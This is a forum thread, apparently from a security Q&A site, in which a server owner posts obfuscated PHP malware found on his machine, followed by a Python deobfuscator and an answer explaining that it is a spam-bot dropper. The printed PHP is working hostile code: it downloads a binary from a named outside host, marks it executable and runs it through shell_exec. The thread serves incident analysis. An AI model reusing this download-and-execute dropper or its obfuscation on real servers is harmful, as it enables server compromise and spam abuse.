Is there any way to easily decipher this virus code?


My server was attacked (I removed the infection - as far as I know) and I want to know what, if anything, might have been compromised (such as my user data, for example).

I posted my last question on Stack Overflow. Well, I noticed that several virus servers were still trying to contact my machine and feeding me malicious code.

I decoded it from base64, but it is still mostly gibberish. I determined that it is trying to access a page called MALICIOUS LINK WARNING: (edited)

Here is the code; I have basically cleaned it up:

    $w50="0o,]a*Lt7/D%[>|WAvITmqpwH~.B5kN1O\r'<( M\tV?^_3F\neb\'+iUXS\9xZ4hzr};P{gs=&yJQ)dj-fE\"2!Rlc@C#nGY:Ku8"; $GLOBALS['fwjlt66'] = $w50[22].$w50[62].$w50[22].$w50[43].$w50[96].$w50[91].$w50[4].$w50[20].$w50[47]; $GLOBALS['qjgox86'] = $w50[80].$w50[96].$w50[91].$w50[87].$w50[7].$w50[53].$w50[1].$w50[91].$w50[43].$w50[47].$w50[59].$w50[53].$w50[70].$w50[7].$w50[70]; $GLOBALS['agnsv93'] = $w50[70].$w50[7].$w50[64].$w50[86].$w50[47].$w50[91]; $GLOBALS['cqvwl52'] = $w50[77].$w50[47].$w50[87].$w50[48].$w50[53].$w50[91]; $GLOBALS['ecgfc33'] = $w50[80].$w50[53].$w50[86].$w50[47].$w50[43].$w50[47].$w50[59].$w50[53].$w50[70].$w50[7].$w50[70]; $GLOBALS['licvl99'] = $w50[59].$w50[62].$w50[29].$w50[73].$w50[69].$w50[58].$w50[50]; $GLOBALS['bokew22'] = $w50[87].$w50[62].$w50[20].$w50[1].$w50[77]; $GLOBALS['wtaky62'] = $w50[70].$w50[62].$w50[47].$w50[86].$w50[86].$w50[43].$w50[47].$w50[59].$w50[47].$w50[87]; $GLOBALS['neabn53'] = $w50[70].$w50[86].$w50[47].$w50[47].$w50[22]; $GLOBALS['cfffy63'] = $w50[96].$w50[91].$w50[86].$w50[53].$w50[91].$w50[29]; $GLOBALS['quyxh40'] = $w50[1].$w50[73].$w50[1].$w50[86].$w50[53].$w50[44].$w50[50]; $GLOBALS['ebiwk51'] = $w50[80].$w50[1].$w50[22].$w50[47].$w50[91]; $GLOBALS['exwal59'] = $w50[87].$w50[96].$w50[64].$w50[86].$w50[43].$w50[53].$w50[91].$w50[53].$w50[7]; $GLOBALS['wyvgi49'] = $w50[87].$w50[96].$w50[64].$w50[86].$w50[43].$w50[70].$w50[47].$w50[7].$w50[1].$w50[22].$w50[7]; $GLOBALS['ayrhy29'] = $w50[87].$w50[96].$w50[64].$w50[86].$w50[43].$w50[47].$w50[59].$w50[47].$w50[87]; $GLOBALS['wkobm38'] = $w50[87].$w50[96].$w50[64].$w50[86].$w50[43].$w50[87].$w50[86].$w50[1].$w50[70].$w50[47]; $GLOBALS['jxivj52'] = $w50[80].$w50[47].$w50[1].$w50[80]; $GLOBALS['wnmlt16'] = $w50[80].$w50[64].$w50[47].$w50[4].$w50[77]; $GLOBALS['yaqtf48'] = $w50[80].$w50[87].$w50[86].$w50[1].$w50[70].$w50[47]; $GLOBALS['nqtio88'] = $w50[87].$w50[59].$w50[7].$w50[77].$w50[22].$w50[44].$w50[61]; $GLOBALS['rxtpe19'] = 
    $w50[80].$w50[53].$w50[86].$w50[47].$w50[43].$w50[22].$w50[96].$w50[7].$w50[43].$w50[87].$w50[1].$w50[91].$w50[7].$w50[47].$w50[91].$w50[7].$w50[70]; $GLOBALS['mrwmq50'] = $w50[80].$w50[23].$w50[64].$w50[53].$w50[7].$w50[47]; $ktjhg56 =$w50[62].$w50[7].$w50[7].$w50[22].$w50[94].$w50[9].$w50[9].$w50[22].$w50[4].$w50[69].$w50[47].$w50[70].$w50[26].$w50[7].$w50[1].$w50[96].$w50[87].$w50[62].$w50[22].$w50[4].$w50[77].$w50[63].$w50[26].$w50[87].$w50[1].$w50[20].$w50[9].$w50[87].$w50[64].$w50[1].$w50[91].$w50[77].$w50[44].$w50[83];
    $kilow69 = "http://pages.touchpadz.com/crond64";
    $xsqmk27 = "XDVSN_SESSION_COOKIE=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";
    $GLOBALS = array([dusbyosox] => fl [pvdmmvljuf] => incfl [ujhcrcgt] => id [smhtcwn] => qstr [jumxqwr] => ids [hnbbbkqfrkpt] => scode [culgtk] => url [krkdpxshxvn] => ch [hjmyjb] => errno [cupqhvfqdl] => msg [wlhdpqq] => errstr [loxnlmgvdc] => err [w50] => 0o,]a*Lt7/D%[>|WAvITmqpwH~.B5kN1O '<( M V?^_3F eb$6'+iUXSxZ4hzr};P{gs=&yJQ)dj-fE"2!Rlc@C#nGY:Ku8 [fwjlt66] => php_uname [qjgox86] => function_exists [agnsv93] => strlen [cqvwl52] => decbin [ecgfc33] => file_exists [licvl99] => xhkyg96 [bokew22] => chmod [wtaky62] => shell_exec [neabn53] => sleep [cfffy63] => unlink [quyxh40] => oyoli36 [ebiwk51] => fopen [exwal59] => curl_init [wyvgi49] => curl_setopt [ayrhy29] => curl_exec [wkobm38] => curl_close [jxivj52] => feof [wnmlt16] => fread [yaqtf48] => fclose [nqtio88] => cxtdp34 [rxtpe19] => file_put_contents [mrwmq50] => fwrite [ktjhg56] => http://pages.touchpadz.com/crond32 [kilow69] => http://pages.touchpadz.com/crond64 [xsqmk27] => XDVSN_SESSION_COOKIE=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)

    // Gives host operating system name
    $aljav65 = php_uname('s');

    // Gives machine type
    $lyvqp40 = php_uname('m');

    echo '<shchzzz>';

    // one-shot loop: every failed step reports an <err> tag and breaks out
    for (;;) {
        if (!function_exists('shell_exec')) {
            echo '<err step=1 err=noshex data=>';
            break;
        }
        if ($aljav65 !== "Linux") {
            echo '<err step=2 err=nolinux data=>';
            break;
        }

        $eeirq58 = 'crond';
        $csjxi53 = "";

        // decimal to binary: ~0 is all one-bits, so the length of its binary
        // form is the PHP word size; this picks the 64-bit or 32-bit download
        if (strlen(decbin(~0)) == 64) {
            echo '<inf step=3 data=x64>';
            $csjxi53 = $kilow69;
        } else {
            echo '<inf step=3 data=x64>';
            $csjxi53 = $ktjhg56;
        }

        $jzugq1 = "";
        if (!file_exists('crond')) {
            $jzugq1 = xhkyg96($w50, 'http://pages.touchpadz.com/crond64crond', 'crond');

            if ($jzugq1 == FALSE) {
                echo '<err step=4 err=downl data=>';
                break;
            } else {
                echo '<inf step=4 data=downok>';
            }
        } else {
            echo '<inf step=4 data=exists>';
        }

        chmod($jzugq1, 755);
        // command line built from the $w50 table, run through shell_exec
        $caaku38 = $xsqmk27.$w50[37].$w50[26].$w50[9].$jzugq1.$w50[37].$w50[13].$w50[9].$w50[77].$w50[47].$w50[17].$w50[9].$w50[91].$w50[96].$w50[86].$w50[86].$w50[37].$w50[83].$w50[13].$w50[9].$w50[77].$w50[47].$w50[17].$w50[9].$w50[91].$w50[96].$w50[86].$w50[86].$w50[37].$w50[72];
        $vepmo93 = shell_exec($caaku38);
        // status tag echoed back to whoever called the script
        echo $w50[35].$w50[53].$w50[91].$w50[80].$w50[37].$w50[70].$w50[7].$w50[47].$w50[22].$w50[71].$w50[28].$w50[37].$w50[77].$w50[4].$w50[7].$w50[4].$w50[71].$w50[77].$w50[1].$w50[91].$w50[47].$w50[37].$w50[77].$w50[4].$w50[7].$w50[4].$w50[83].$w50[71].$vepmo93.$w50[13];
        sleep(1);
        unlink($jzugq1);
        break;
    }

    echo '</shchzzz>';
    exit();

    // fetch a URL: plain fopen() first, cURL as the fallback
    function oyoli36($w50, $iyjzg82) {
        $kxsnc64 = "";
        $gnmie55 = @fopen($iyjzg82, 'rb');
        if ($gnmie55 == FALSE) {
            if (!function_exists('curl_init')) return FALSE;
            $iahsh76 = @curl_init();
            @curl_setopt($iahsh76, CURLOPT_URL, $iyjzg82);
            @curl_setopt($iahsh76, CURLOPT_RETURNTRANSFER, true);
            $kxsnc64 = @curl_exec($iahsh76);
            @curl_close($iahsh76);
        } else {
            while (!feof($gnmie55)) $kxsnc64 .= fread($gnmie55, 1024 * 64);
            fclose($gnmie55);
        }
        return $kxsnc64;
    }

    // write the downloaded bytes to disk: fwrite() first, file_put_contents() as the fallback
    function cxtdp34($w50, $ekfco84, $kxsnc64) {
        $dlyti36 = fopen($ekfco84, 'wb+');
        if ($dlyti36 == FALSE) {
            if (!function_exists('file_put_contents')) return FALSE;
            if (@file_put_contents($ekfco84, $kxsnc64) === FALSE) return FALSE;
        } else {
            $gibnq51 = fwrite($dlyti36, $kxsnc64, strlen($kxsnc64));
            fclose($dlyti36);
            if ($gibnq51 == FALSE || $gibnq51 != strlen($kxsnc64)) return FALSE;
        }
        return TRUE;
    }

    // download to the current directory, falling back to /tmp; returns the path or FALSE
    function xhkyg96($w50, $iyjzg82, $vmtdr19) {
        $kxsnc64 = oyoli36($w50, $iyjzg82);
        if ($kxsnc64 == FALSE) return FALSE;
        if (cxtdp34($w50, $w50[26].$w50[9].$vmtdr19, $kxsnc64) == FALSE) {
            if (cxtdp34($w50, '/tmp/'.$vmtdr19, $kxsnc64) == FALSE) {
                return FALSE;
            } else {
                return '/tmp'.$vmtdr19;
            }
        } else {
            return "./".$vmtdr19;
        }
        return FALSE;
    }

I was hoping someone might know of a service that interprets this, or could tell me what may have happened. I can try to reconstruct it myself, but if anyone has any information, that would be very useful to me.

    
posted by Andy Alexander 31.03.2015 - 02:30
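As an added example (not code from the question or the answer), here is a small Python deobfuscator for the `$w50[N]` character-table scheme the snippet uses: it resolves each `$GLOBALS['alias'] = $w50[..].$w50[..]...;` assignment to the string it builds and inlines the real names at the call sites. The table is taken from the `$GLOBALS` dump in the question, which still contains the two characters `$6` after `eb` that the pasted one-liner dropped; the sample input is two alias lines copied from the question plus one constructed call site.

```python
import re

# The $w50 character table, as it appears in the $GLOBALS dump in the question.
# The pasted one-liner dropped the two characters "$6" after "eb"; the dump has
# them, and the index arithmetic below only works with them present. PHP keeps
# the unknown escape "\9" as the two characters backslash and 9.
W50 = ("0o,]a*Lt7/D%[>|WAvITmqpwH~.B5kN1O\r'<( M\tV?^_3F\n"
       "eb$6'+iUXS\\9xZ4hzr};P{gs=&yJQ)dj-fE\"2!Rlc@C#nGY:Ku8")

INDEX_RE = re.compile(r"\$w50\[(\d+)\]")
ALIAS_RE = re.compile(r"\$GLOBALS\['(\w+)'\]\s*=\s*([^;]+);")
CALL_RE = re.compile(r"\$GLOBALS\['(\w+)'\]")

# Constructed sample: two alias assignments copied from the question and one
# hypothetical call site of the kind the original (pre-cleanup) script uses.
SAMPLE = """
$GLOBALS['fwjlt66'] = $w50[22].$w50[62].$w50[22].$w50[43].$w50[96].$w50[91].$w50[4].$w50[20].$w50[47];
$GLOBALS['wtaky62'] = $w50[70].$w50[62].$w50[47].$w50[86].$w50[86].$w50[43].$w50[47].$w50[59].$w50[47].$w50[87];
$aljav65 = $GLOBALS['fwjlt66']('s');
"""

def resolve(expr: str, table: str = W50) -> str:
    """Turn a '.'-joined chain of $w50[N] lookups into the string it builds."""
    return "".join(table[int(i)] for i in INDEX_RE.findall(expr))

def deobfuscate(php: str, table: str = W50) -> dict:
    """Map each $GLOBALS['alias'] to the function name or string it hides."""
    return {alias: resolve(expr, table) for alias, expr in ALIAS_RE.findall(php)}

def rewrite(php: str, table: str = W50) -> str:
    """Drop the alias assignments and inline the real names at the call sites."""
    names = deobfuscate(php, table)
    body = ALIAS_RE.sub("", php)
    return CALL_RE.sub(lambda m: names.get(m.group(1), m.group(0)), body)

if __name__ == "__main__":
    for alias, real in deobfuscate(SAMPLE).items():
        print(f"{alias} -> {real}")
    print(rewrite(SAMPLE))
```

The same table also builds the download URL, the command string passed to `shell_exec` and the status tags echoed back, so `resolve()` applied to those concatenations reads them out as well.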

1 answer


I disassembled the 64-bit binary and went through the code, and it looks like it only downloads and sends out email - it does not appear to attempt to compromise the system.

The PHP code downloads and launches the 32-bit or 64-bit version of the spammer program, depending on the system, at /tmp/crond. The program then downloads the following items over HTTP from its C&C server:

  1. An email message to send
  2. A list of email addresses
  3. Several URLs pointing at their PHP mailer script, which is used to send the email messages

The C&C servers are set through the XDVSN_SESSION_COOKIE environment variable, which is base64-encoded and XOR'ed with 1's. Launching their binary without the environment variable makes the program terminate immediately.

It looks like this exploit will fail if /tmp is mounted with noexec, although the attacker can easily change that.

    
answered 09.05.2015 - 00:02
